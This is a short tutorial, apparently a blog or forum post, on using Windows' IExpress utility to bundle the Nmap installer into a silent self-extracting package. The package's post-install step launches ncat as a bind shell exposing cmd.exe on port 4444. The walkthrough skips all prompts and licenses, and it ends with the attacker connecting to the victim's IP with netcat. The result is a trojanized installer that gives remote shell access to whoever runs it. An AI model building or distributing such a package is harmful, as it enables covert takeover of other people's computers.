IExpress is a Microsoft utility bundled with various editions of Windows operating systems (32-bit and 64-bit): Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7. It was also included as part of all Internet Explorer Administration Kit releases 4, 5 and 6, and was part of all installations of Internet Explorer 6.
IEXPRESS.EXE is used to create a single self-extracting package from a set of files. Such packages can be used to install applications, executables, drivers, other system components, or setup bootstrappers.
Download nmap for windows
Windows run iexpress
1. Create new Self Extraction Directive file. Next
2. Extract files and run installation command. Next
3. Package title = Up to you. Next
4. No prompt. Next
5. Do not display a license. Next
6. Add (locate were your downloaded nmap-setup.) Next
7. Install Program (pull down and select the nmap-setup file.) Post Install Command paste in the following C:\Program Files (x86)\Nmap\ncat.exe -lvvp 4444 -e cmd.exe
8. Default (recommended) Next
9. No message. Next
10. Click Browse and then point to were you want to save .exe too, name it click Save. Next
11. No restart. Next
12. Don’t save. Next (No need to save SED file)
15. File will be created and then look in the folder were you saved it too under instruction 10.
root@bt:~# nc -v (ip address) 4444